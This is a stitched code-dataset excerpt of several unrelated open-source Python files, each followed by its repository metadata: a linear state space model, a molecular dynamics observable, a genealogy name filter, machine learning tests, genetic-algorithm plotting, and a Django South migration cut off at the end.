x_0 ~ N(mu_0, Sigma_0).
Parameters
----------
T : scalar(int), optional(default=10)
The period that we want to replicate values for
num_reps : scalar(int), optional(default=100)
The number of replications that we want
Returns
-------
x : array_like(float)
An n x num_reps array, where the j-th column is the j_th
observation of x_T
y : array_like(float)
A k x num_reps array, where the j-th column is the j_th
observation of y_T
"""
x = np.empty((self.n, num_reps))
for j in range(num_reps):
x_T, _ = self.simulate(ts_length=T+1)
x[:, j] = x_T[:, -1]
if self.H is not None:
v = np.random.randn(self.l, num_reps)
y = self.G.dot(x) + self.H.dot(v)
else:
y = self.G.dot(x)
return x, y
def moment_sequence(self):
"""
Create a generator to calculate the population mean and
variance-convariance matrix for both x_t and y_t, starting at
the initial condition (self.mu_0, self.Sigma_0). Each iteration
produces a 4-tuple of items (mu_x, mu_y, Sigma_x, Sigma_y) for
the next period.
Yields
------
mu_x : array_like(float)
An n x 1 array representing the population mean of x_t
mu_y : array_like(float)
A k x 1 array representing the population mean of y_t
Sigma_x : array_like(float)
An n x n array representing the variance-covariance matrix
of x_t
Sigma_y : array_like(float)
A k x k array representing the variance-covariance matrix
of y_t
"""
# == Simplify names == #
A, C, G, H = self.A, self.C, self.G, self.H
# == Initial moments == #
mu_x, Sigma_x = self.mu_0, self.Sigma_0
while 1:
mu_y = G.dot(mu_x)
if H is None:
Sigma_y = G.dot(Sigma_x).dot(G.T)
else:
Sigma_y = G.dot(Sigma_x).dot(G.T) + H.dot(H.T)
yield mu_x, mu_y, Sigma_x, Sigma_y
# == Update moments of x == #
mu_x = A.dot(mu_x)
Sigma_x = A.dot(Sigma_x).dot(A.T) + C.dot(C.T)
def stationary_distributions(self, max_iter=200, tol=1e-5):
"""
Compute the moments of the stationary distributions of x_t and
y_t if possible. Computation is by iteration, starting from the
initial conditions self.mu_0 and self.Sigma_0
Parameters
----------
max_iter : scalar(int), optional(default=200)
The maximum number of iterations allowed
tol : scalar(float), optional(default=1e-5)
The tolerance level that one wishes to achieve
Returns
-------
mu_x_star : array_like(float)
An n x 1 array representing the stationary mean of x_t
mu_y_star : array_like(float)
An k x 1 array representing the stationary mean of y_t
Sigma_x_star : array_like(float)
An n x n array representing the stationary var-cov matrix
of x_t
Sigma_y_star : array_like(float)
An k x k array representing the stationary var-cov matrix
of y_t
"""
# == Initialize iteration == #
m = self.moment_sequence()
mu_x, mu_y, Sigma_x, Sigma_y = next(m)
i = 0
error = tol + 1
# == Loop until convergence or failure == #
while error > tol:
if i > max_iter:
fail_message = 'Convergence failed after {} iterations'
raise ValueError(fail_message.format(max_iter))
else:
i += 1
mu_x1, mu_y1, Sigma_x1, Sigma_y1 = next(m)
error_mu = np.max(np.abs(mu_x1 - mu_x))
error_Sigma = np.max(np.abs(Sigma_x1 - Sigma_x))
error = max(error_mu, error_Sigma)
mu_x, Sigma_x = mu_x1, Sigma_x1
# == Prepare return values == #
mu_x_star, Sigma_x_star = mu_x, Sigma_x
mu_y_star, Sigma_y_star = mu_y1, Sigma_y1
return mu_x_star, mu_y_star, Sigma_x_star, Sigma_y_star
def geometric_sums(self, beta, x_t):
"""
Forecast the geometric sums
S_x := E [sum_{j=0}^{\infty} beta^j x_{t+j} | x_t ]
S_y := E [sum_{j=0}^{\infty} beta^j y_{t+j} | x_t ]
Parameters
----------
beta : scalar(float)
Discount factor, in [0, 1)
beta : array_like(float)
The term x_t for conditioning
Returns
-------
S_x : array_like(float)
Geometric sum as defined above
S_y : array_like(float)
Geometric sum as defined above
"""
I = np.identity(self.n)
S_x = solve(I - beta * self.A, x_t)
S_y = self.G.dot(S_x)
return S_x, S_y
|
dingliumath/quant-econ
|
quantecon/lss.py
|
Python
|
bsd-3-clause
| 10,481
|
[
"Gaussian"
] |
e923c035361c63ae10c015aeae3248355765a940f8c91675f087d94ffba8f108
|
# Copyright (C) 2012,2013
# Max Planck Institute for Polymer Research
# Copyright (C) 2008,2009,2010,2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
r"""
*****************************
**espressopp.analysis.NPart**
*****************************
.. function:: espressopp.analysis.NPart(system)
:param system:
:type system:
"""
from espressopp.esutil import cxxinit
from espressopp import pmi
from espressopp.analysis.Observable import *
from _espressopp import analysis_NPart
class NPartLocal(ObservableLocal, analysis_NPart):
def __init__(self, system):
if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
cxxinit(self, analysis_NPart, system)
if pmi.isController :
class NPart(Observable):
__metaclass__ = pmi.Proxy
pmiproxydefs = dict(
cls = 'espressopp.analysis.NPartLocal'
)
|
capoe/espressopp.soap
|
src/analysis/NPart.py
|
Python
|
gpl-3.0
| 1,624
|
[
"ESPResSo"
] |
c022a59e5387f84e29fdc6cc73b28a569e2383031bc5895460814b5620f36fd2
|
#
# gPrime - A web-based genealogy program
#
# Copyright (C) 2002-2007 Donald N. Allingham
# Copyright (C) 2007-2008 Brian G. Matherly
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#-------------------------------------------------------------------------
#
# Standard Python modules
#
#-------------------------------------------------------------------------
from ....const import LOCALE as glocale
_ = glocale.translation.sgettext
#-------------------------------------------------------------------------
#
# Gprime modules
#
#-------------------------------------------------------------------------
from .. import Rule
from ....lib.nameorigintype import NameOriginType
#-------------------------------------------------------------------------
#
# HasNameOf
#
#-------------------------------------------------------------------------
class HasNameOf(Rule):
"""Rule that checks for full or partial name matches"""
labels = [_('Given name:'),
_('Full Family name:'),
_('person|Title:'),
_('Suffix:'),
_('Call Name:'),
_('Nick Name:'),
_('Prefix:'),
_('Single Surname:'),
_('Connector'),
_('Patronymic:'),
_('Family Nick Name:')]
name = _('People with the <name>')
description = _("Matches people with a specified (partial) name")
category = _('General filters')
allow_regex = True
def apply(self, db, person):
for name in [person.get_primary_name()] + person.get_alternate_names():
if self.match_name(name):
return True
return False
def match_name(self, name):
if self.list[0] and not self.match_substring(0, name.get_first_name()):
return False
elif self.list[1] and not self.match_substring(1, name.get_surname()):
return False
elif self.list[2] and not self.match_substring(2, name.get_title()):
return False
elif self.list[3] and not self.match_substring(3, name.get_suffix()):
return False
elif self.list[4] and not self.match_substring(4, name.get_call_name()):
return False
elif self.list[5] and not self.match_substring(5, name.get_nick_name()):
return False
elif self.list[10] and not self.match_substring(10, name.get_family_nick_name()):
return False
else:
for surn in name.get_surname_list():
if self.match_surname(surn):
return True
return False
def match_surname(self, surn):
if self.list[6] and not self.match_substring(6, surn.get_prefix()):
return False
if self.list[7] and not self.match_substring(7, surn.get_surname()):
return False
if self.list[8] and not self.match_substring(8, surn.get_connector()):
return False
if surn.get_origintype().value == NameOriginType.PATRONYMIC:
if self.list[9] and not self.match_substring(9, surn.get_surname()):
return False
return True
|
sam-m888/gprime
|
gprime/filters/rules/person/_hasnameof.py
|
Python
|
gpl-2.0
| 3,872
|
[
"Brian"
] |
0ba59e7f70a0af9b3b8c071a27d7ac091894c3733b30935c15127fb644c33a57
|
import os
import numpy
from PyML.classifiers import svm,multi,ridgeRegression,knn,composite,modelSelection,platt
from PyML.feature_selection import featsel
from PyML.containers import ker,labels
from PyML.containers import vectorDatasets
from PyML.containers.aggregate import Aggregate
from PyML.containers.kernelData import KernelData
from PyML.containers.sequenceData import SequenceData
from PyML.evaluators import assess
heartdatafile = '../../data/heart.data'
irisdatafile = '../../data/iris.data'
yeastdatafile = '../../data/yeast.data'
def test(component='svm', **args) :
container = 'SparseDataSet'
if 'container' in args :
container = args['container']
try :
DataSet = getattr(vectorDatasets, container)
except :
raise ValueError, 'wrong container ' + container
results = {}
comp = 'general'
if component == 'all' or component == comp :
s = svm.SVM()
results = {}
d = DataSet (heartdatafile, labelsColumn = 0)
s.train(d)
s.test(d)
s = svm.SVM()
s.stratifiedCV(d)
print 'starting aggregate****************'
d2 = Aggregate([d,d])
print 'end aggregate'
r = s.stratifiedCV(d2)
d.attachKernel('polynomial')
s.cv(d)
d.attachKernel('linear')
s = svm.SVM()
s.train(d)
s.train(d, saveSpace = False)
s.save("tmp")
loaded = svm.loadSVM("tmp", datasetClass=DataSet)
r = loaded.test(d)
d.attachKernel('gaussian', gamma = 0.01)
s.train(d, saveSpace = False)
s.save("tmp")
loaded = svm.loadSVM("tmp", datasetClass=DataSet, labelsColumn = 1)
r = loaded.test(d)
os.remove('tmp')
d = DataSet(numpy.random.randn(100,10))
d = DataSet([[1,2], [2,3]])
d = SequenceData(['asa', 'ben', 'hur'])
comp = 'svm'
if component == 'all' or component == comp :
d = DataSet (heartdatafile, labelsColumn = 0)
results[comp] = []
d.attachKernel('polynomial')
s=svm.SVM()
results[comp].append(
s.cv(d, saveSpace = True))
d.attachKernel('linear')
results[comp].append(
s.cv(d))
comp = 'kernelData'
if component == 'all' or component == comp :
d = DataSet (heartdatafile, labelsColumn = 0)
results[comp] = []
kdata = KernelData('heart.kernel', gistFormat = True)
kdata.attachLabels(d.labels)
s=svm.SVM()
results[comp].append(
s.cv(kdata))
kdata.attachKernel('gaussian', gamma = 0.1)
results[comp].append(
s.cv(kdata))
comp = 'normalization'
if component == 'all' or component == comp :
results[comp] = []
data = DataSet (heartdatafile, labelsColumn = 0)
data.attachKernel('polynomial', degree = 4, normalization = 'dices')
s=svm.SVM()
results[comp].append(
s.cv(data))
comp = 'svr'
if component == 'all' or component == comp :
d = DataSet (heartdatafile, labelsColumn = 0, numericLabels = True)
results[comp] = []
s = svm.SVR()
#results[comp].append(
# s.cv(d, saveSpace = True))
#results[comp].append(
# s.trainTest(d, range(150), range(151, 250)))
results[comp].append( s.cv(d) )
comp = 'save'
if component == 'all' or component == comp :
results[comp] = []
s = svm.SVM()
data = DataSet (heartdatafile, labelsColumn = 0)
import tempfile
tmpfile = tempfile.mktemp()
r = s.cv(data)
r.save(tmpfile)
r = assess.loadResults(tmpfile)
results['save'].append(r)
r = s.nCV(data)
r.save(tmpfile)
results['save'].append(assess.loadResults(tmpfile))
r = {}
for i in range(10) :
r[i] = s.cv(data)
assess.saveResultObjects(r, tmpfile)
r = assess.loadResults(tmpfile)
comp = 'classifiers'
if component == 'all' or component == comp :
d = DataSet (heartdatafile, labelsColumn = 0)
results[comp] = []
cl = knn.KNN()
results[comp].append(
cl.stratifiedCV(d))
print 'testing ridge regression'
ridge = ridgeRegression.RidgeRegression()
results[comp].append(
ridge.cv(d))
comp = 'platt'
if component == 'all' or component == 'platt' :
results[comp] = []
d = DataSet (heartdatafile, labelsColumn = 0)
p = platt.Platt2(svm.SVM())
results[comp].append(p.stratifiedCV(d))
comp = 'multi'
if component == 'all' or component == comp :
results[comp] = []
d = DataSet(irisdatafile, labelsColumn = -1)
mc = multi.OneAgainstOne (svm.SVM())
results[comp].append(
mc.cv(d))
d = DataSet(irisdatafile, labelsColumn = -1)
mc = multi.OneAgainstRest (svm.SVM())
results[comp].append(
mc.cv(d))
mc = multi.OneAgainstRest (svm.SVM())
d.attachKernel('poly')
results[comp].append(
mc.cv(d))
d.attachKernel('linear')
mc = multi.OneAgainstRest (svm.SVM())
#kdata = datafunc.KernelData('iris.linear.kernel',
# labelsFile = 'irisY.csv', labelsColumn = 0, gistFormat = True)
#results[comp].append(mc.cv(kdata))
comp = 'featsel'
if component == 'all' or component == comp :
results[comp] = []
s = svm.SVM()
d = DataSet (yeastdatafile, labelsColumn = 0)
d2 = labels.oneAgainstRest(d, '2')
results[comp].append(
s.stratifiedCV(d2))
# feature selection using RFE
m = composite.FeatureSelect (s, featsel.RFE())
results[comp].append(
m.stratifiedCV(d2, 3))
fs = featsel.FeatureScore ('golub')
f = featsel.Filter (fs, sigma = 2)
f = featsel.Filter (fs, numFeatures = 20)
m = composite.FeatureSelect (s, f)
results[comp].append(
m.stratifiedCV(d2, 3))
# same thing but with a Chain:
c = composite.Chain ([f,s])
#r = c.stratifiedCV (d2)
comp = 'modelSelection'
if component == 'all' or component == comp :
results[comp] = []
s = svm.SVM()
d = DataSet (heartdatafile, labelsColumn = 0)
p = modelSelection.ParamGrid(svm.SVM(ker.Polynomial()), 'C', [0.1, 1, 10, 100],
'kernel.degree', [2, 3, 4])
p = modelSelection.ParamGrid(svm.SVM(ker.Gaussian()), 'C', [0.1, 1, 10, 100],
'kernel.gamma', [0.01, 0.1, 1])
#p = modelSelection.Param(svm.SVM(), 'C', [0.1, 1, 10, 100])
m = modelSelection.ModelSelector(p, measure = 'roc', foldsToPerform = 2)
m = modelSelection.ModelSelector(p)
#m = modelSelection.SVMselect()
results[comp].append(
m.cv(d))
return results
if __name__ == '__main__' :
if len(sys.argv) > 1 :
test(sys.argv[1])
else :
test()
|
cathywu/Sentiment-Analysis
|
PyML-0.7.9/PyML/demo/test.py
|
Python
|
gpl-2.0
| 7,168
|
[
"Gaussian"
] |
7a590baef54d86443e699f326a8e3e857658e9833f86d01585baae452f1ff277
|
import pylab
from matplotlib.font_manager import FontProperties
import matplotlib.cm
def graph_pop_heatmap_raw(pop, identify, minimize=False, colormap="jet", filesave=None):
pylab.imshow(pop, aspect="auto", interpolation="gaussian", cmap=matplotlib.cm.__dict__[colormap])
pylab.title("Plot of pop. raw scores along the generations")
pylab.xlabel('Population')
pylab.ylabel('Generations')
pylab.grid(True)
pylab.colorbar()
if filesave:
pylab.savefig(filesave)
print "Graph saved to %s file !" % (filesave,)
else:
pylab.show()
def graph_diff_raw(pop, identify, minimize=False, filesave=None):
x = []
diff_raw_y = []
diff_fit_y = []
for it in pop:
x.append(it["generation"])
diff_raw_y.append(it["rawMax"] - it["rawMin"])
diff_fit_y.append(it["fitMax"] - it["fitMin"])
pylab.figure()
pylab.subplot(211)
pylab.plot(x, diff_raw_y, "g", label="Raw difference", linewidth=1.2)
pylab.fill_between(x, diff_raw_y, color="g", alpha=0.1)
diff_raw_max= max(diff_raw_y)
gen_max_raw = x[diff_raw_y.index(diff_raw_max)]
pylab.annotate("Maximum (%.2f)" % (diff_raw_max,), xy=(gen_max_raw, diff_raw_max), xycoords='data',
xytext=(-150, -20), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc"),
)
pylab.xlabel("Generation (#)")
pylab.ylabel("Raw difference")
pylab.title("Plot of evolution identified by '%s'" % (identify))
pylab.grid(True)
pylab.legend(prop=FontProperties(size="smaller"), loc=0)
pylab.subplot(212)
pylab.plot(x, diff_fit_y, "b", label="Fitness difference", linewidth=1.2)
pylab.fill_between(x, diff_fit_y, color="b", alpha=0.1)
diff_fit_max= max(diff_fit_y)
gen_max_fit = x[diff_fit_y.index(diff_fit_max)]
pylab.annotate("Maximum (%.2f)" % (diff_fit_max,), xy=(gen_max_fit, diff_fit_max), xycoords='data',
xytext=(-150, -20), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc"),
)
pylab.xlabel("Generation (#)")
pylab.ylabel("Fitness difference")
pylab.grid(True)
pylab.legend(prop=FontProperties(size="smaller"), loc=0)
if filesave:
pylab.savefig(filesave)
print "Graph saved to %s file !" % (filesave,)
else:
pylab.show()
def graph_errorbars_raw(pop, identify, minimize=False, filesave=None):
x = []
y = []
yerr_max = []
yerr_min = []
for it in pop:
x.append(it["generation"])
y.append(it["rawAve"])
ymax = it["rawMax"] - it["rawAve"]
ymin = it["rawAve"] - it["rawMin"]
yerr_max.append(ymax)
yerr_min.append(ymin)
pylab.figure()
pylab.errorbar(x, y, [yerr_min, yerr_max], ecolor="g")
pylab.xlabel('Generation (#)')
pylab.ylabel('Raw score Min/Avg/Max')
pylab.title("Plot of evolution identified by '%s' (raw scores)" % (identify))
pylab.grid(True)
if filesave:
pylab.savefig(filesave)
print "Graph saved to %s file !" % (filesave,)
else:
pylab.show()
def graph_errorbars_fitness(pop, identify, minimize=False, filesave=None):
x = []
y = []
yerr_max = []
yerr_min = []
for it in pop:
x.append(it["generation"])
y.append(it["fitAve"])
ymax = it["fitMax"] - it["fitAve"]
ymin = it["fitAve"] - it["fitMin"]
yerr_max.append(ymax)
yerr_min.append(ymin)
pylab.figure()
pylab.errorbar(x, y, [yerr_min, yerr_max], ecolor="g")
pylab.xlabel('Generation (#)')
pylab.ylabel('Fitness score Min/Avg/Max')
pylab.title("Plot of evolution identified by '%s' (fitness scores)" % (identify))
pylab.grid(True)
if filesave:
pylab.savefig(filesave)
print "Graph saved to %s file !" % (filesave,)
else:
pylab.show()
def graph_maxmin_raw(pop, identify, minimize=False, filesave=None):
x = []
max_y = []
min_y = []
std_dev_y = []
avg_y = []
for it in pop:
x.append(it["generation"])
max_y.append(it["rawMax"])
min_y.append(it["rawMin"])
std_dev_y.append(it["rawDev"])
avg_y.append(it["rawAve"])
pylab.figure()
pylab.plot(x, max_y, "g", label="Max raw", linewidth=1.2)
pylab.plot(x, min_y, "r", label="Min raw", linewidth=1.2)
pylab.plot(x, avg_y, "b", label="Avg raw", linewidth=1.2)
pylab.plot(x, std_dev_y, "k", label="Std Dev raw", linewidth=1.2)
pylab.fill_between(x, min_y, max_y, color="g", alpha=0.1, label="Diff max/min")
if minimize: raw_max = min(min_y)
else: raw_max= max(max_y)
if minimize: gen_max = x[min_y.index(raw_max)]
else: gen_max = x[max_y.index(raw_max)]
min_std = min(std_dev_y)
gen_min_std = x[std_dev_y.index(min_std)]
max_std = max(std_dev_y)
gen_max_std = x[std_dev_y.index(max_std)]
if minimize: annot_label = "Minimum (%.2f)" % (raw_max,)
else: annot_label = "Maximum (%.2f)" % (raw_max,)
pylab.annotate(annot_label, xy=(gen_max, raw_max), xycoords='data',
xytext=(8, 15), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc"),
)
pylab.annotate("Min StdDev (%.2f)" % (min_std,), xy=(gen_min_std, min_std), xycoords='data',
xytext=(8, 15), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc"),
)
pylab.annotate("Max StdDev (%.2f)" % (max_std,), xy=(gen_max_std, max_std), xycoords='data',
xytext=(8, 15), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc"),
)
pylab.xlabel("Generation (#)")
pylab.ylabel("Raw score")
pylab.title("Plot of evolution identified by '%s' (raw scores)" % (identify))
pylab.grid(True)
pylab.legend(prop=FontProperties(size="smaller"),loc=0)
if filesave:
pylab.savefig(filesave)
print "Graph saved to %s file !" % (filesave,)
else:
pylab.show()
def graph_maxmin_fitness(pop, identify, minimize=False, filesave=None):
x = []
max_y = []
min_y = []
avg_y = []
for it in pop:
x.append(it["generation"])
max_y.append(it["fitMax"])
min_y.append(it["fitMin"])
avg_y.append(it["fitAve"])
pylab.figure()
pylab.plot(x, max_y, "g", label="Max fitness")
pylab.plot(x, min_y, "r", label="Min fitness")
pylab.plot(x, avg_y, "b", label="Avg fitness")
pylab.fill_between(x, min_y, max_y, color="g", alpha=0.1, label="Diff max/min")
if minimize: raw_max = min(min_y)
else: raw_max = max(max_y)
if minimize: gen_max = x[min_y.index(raw_max)]
else: gen_max = x[max_y.index(raw_max)]
if minimize: annot_label = "Minimum (%.2f)" % (raw_max,)
else: annot_label = "Maximum (%.2f)" % (raw_max,)
pylab.annotate(annot_label, xy=(gen_max, raw_max), xycoords='data',
xytext=(8, 15), textcoords='offset points',
arrowprops=dict(arrowstyle="->",
connectionstyle="arc"),
)
pylab.xlabel("Generation (#)")
pylab.ylabel("Fitness score")
pylab.title("Plot of evolution identified by '%s' (fitness scores)" % (identify))
pylab.grid(True)
pylab.legend(prop=FontProperties(size="smaller"),loc=0)
if filesave:
pylab.savefig(filesave)
print "Graph saved to %s file !" % (filesave,)
else:
pylab.show()
def load_population(dbfile, identify):
pop = None
import os.path
if not os.path.exists(dbfile):
print "Database file '%s' not found !" % (dbfile, )
return pop
import sqlite3
print "Loading database..."
conn = sqlite3.connect(dbfile)
conn.row_factory = sqlite3.Row
c = conn.cursor()
ret = c.execute("select * from statistics where identify = ?", (identify,))
pop = ret.fetchall()
ret.close()
conn.close()
if len(pop) <= 0:
print "No statistic data found for the identify '%s' !" % (identify,)
return pop
print "%d generations found !" % (len(pop),)
return pop
def load_population_hm(dbfile, identify):
pop = None
import os.path
if not os.path.exists(dbfile):
print "Database file '%s' not found !" % (dbfile, )
return pop
import sqlite3
print "Loading database..."
conn = sqlite3.connect(dbfile)
conn.row_factory = sqlite3.Row
c = conn.cursor()
ret = c.execute("select distinct generation from population where identify = ?", (identify,))
generations = ret.fetchall()
if len(generations) <= 0:
print "No generation data found for the identify '%s' !" % (identify,)
return pop
pop = []
for gen in generations:
pop_tmp = []
ret = c.execute("""
select * from population
where identify = ?
and generation = ?
""", (identify, gen[0]))
ret_fetch = ret.fetchall()
for it in ret_fetch:
pop_tmp.append(it["raw"])
pop.append(pop_tmp)
ret.close()
conn.close()
if len(pop) <= 0:
print "No statistic data found for the identify '%s' !" % (identify,)
return pop
print "%d generations found !" % (len(pop),)
return pop
def plot_errorbars_raw(dbfile, identify):
pop = load_population(dbfile, identify)
if len(pop) > 0:
graph_errorbars_raw(pop, identify)
def plot_errorbars_fitness(dbfile, identify):
pop = load_population(dbfile, identify)
if len(pop) > 0:
graph_errorbars_fitness(pop, identify)
def plot_maxmin_raw(dbfile, identify):
pop = load_population(dbfile, identify)
if len(pop) > 0:
graph_maxmin_raw(pop, identify)
def plot_maxmin_fitness(dbfile, identify):
pop = load_population(dbfile, identify)
if len(pop) > 0:
graph_maxmin_fitness(pop, identify)
def plot_diff_raw(dbfile, identify):
pop = load_population(dbfile, identify)
if len(pop) > 0:
graph_diff_raw(pop, identify)
def plot_pop_heatmap_raw(dbfile, identify):
pop = load_population_hm(dbfile, identify)
if len(pop) > 0:
graph_pop_heatmap_raw(pop, identify)
|
ecervera/ga-nb
|
pyevolve_plot.py
|
Python
|
mit
| 10,489
|
[
"Gaussian"
] |
cdb768308a55a58869a97b8ca187b0ad8e087ee2d9d41aa048c85923a097d750
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding index on 'Visit', fields ['wrhi_orig_date']
db.create_index(u'core_visit', ['wrhi_orig_date'])
# Adding index on 'Visit', fields ['date']
db.create_index(u'core_visit', ['date'])
# Adding index on 'HistoricalVisit', fields ['wrhi_orig_date']
db.create_index(u'core_historicalvisit', ['wrhi_orig_date'])
# Adding index on 'HistoricalVisit', fields ['date']
db.create_index(u'core_historicalvisit', ['date'])
def backwards(self, orm):
# Removing index on 'HistoricalVisit', fields ['date']
db.delete_index(u'core_historicalvisit', ['date'])
# Removing index on 'HistoricalVisit', fields ['wrhi_orig_date']
db.delete_index(u'core_historicalvisit', ['wrhi_orig_date'])
# Removing index on 'Visit', fields ['date']
db.delete_index(u'core_visit', ['date'])
# Removing index on 'Visit', fields ['wrhi_orig_date']
db.delete_index(u'core_visit', ['wrhi_orig_date'])
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'core.authprofile': {
'Meta': {'object_name': 'AuthProfile'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'patient': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['core.Patient']", 'unique': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['auth.User']", 'unique': 'True'})
},
u'core.changerequest': {
'Meta': {'ordering': "['-created_at']", 'object_name': 'ChangeRequest'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'request': ('django.db.models.fields.TextField', [], {}),
'request_type': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'pending'", 'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'visit': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Visit']"})
},
u'core.clinic': {
'Meta': {'object_name': 'Clinic'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'te_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'clinic'", 'null': 'True', 'to': u"orm['auth.User']"})
},
u'core.clinicnamemapping': {
'Meta': {'object_name': 'ClinicNameMapping'},
'clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Clinic']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'wrhi_clinic_name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'core.event': {
'Meta': {'object_name': 'Event'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'core.historicalpatient': {
'Meta': {'ordering': "('-history_id',)", 'object_name': 'HistoricalPatient'},
'active_msisdn': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.MSISDN']", 'null': 'True', 'blank': 'True'}),
'age': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'deceased': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'disclosed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'history_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2015, 4, 17, 0, 0)'}),
'history_id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'history_type': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
u'id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'blank': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': u"orm['core.Language']", 'null': 'True', 'blank': 'True'}),
'last_clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Clinic']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
